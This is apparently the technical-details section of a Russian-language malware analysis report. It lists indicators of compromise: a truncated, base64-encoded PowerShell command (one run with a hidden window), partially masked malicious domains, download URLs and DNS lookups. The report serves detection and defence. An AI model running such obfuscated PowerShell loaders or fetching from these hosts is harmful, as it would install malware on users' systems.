Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KAAgAE4ARQB3AC0ATwBiAGoAZQBDAFQAIABpAE8ALgBzAHQAUgBlAEEAbQBSAEUAQQBEAGUAUgAoACAAKAAgAE4ARQB3AC0ATwBiAGoAZQBDAFQAIAAgAGkATwAuAEMATwBNAFAAcgBlAHMAcwBJAG8ATgAuAEQARQBGAEwAQQBUAGUAcwB0AFIARQBhAE...
- 'va###events.nl':80
- 'mi####taffing.com':80
- 'ro###dios.ca':80
- 'di####entsight.net':80
- 'wi###mjan.info':80
- http://va###events.nl/a3BcMo2/
- http://ro###dios.ca/ZaxcX41VAh/
- http://di####entsight.net/BPPdCo20K/
- http://wi###mjan.info/x9L1bBbn/
- http://www.wi###mjan.info/x9L1bBbn/
- DNS ASK va###events.nl
- DNS ASK mi####taffing.com
- DNS ASK ro###dios.ca
- DNS ASK di####entsight.net
- DNS ASK wi###mjan.info
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KAAgAE4ARQB3AC0ATwBiAGoAZQBDAFQAIABpAE8ALgBzAHQAUgBlAEEAbQBSAEUAQQBEAGUAUgAoACAAKAAgAE4ARQB3AC0ATwBiAGoAZQBDAFQAIAAgAGkATwAuAEMATwBNAFAAcgBlAHMAcwBJAG8ATgAuAEQARQBGAEwAQQBUAGUAcwB0AFIARQBhAE...' (со скрытым окном)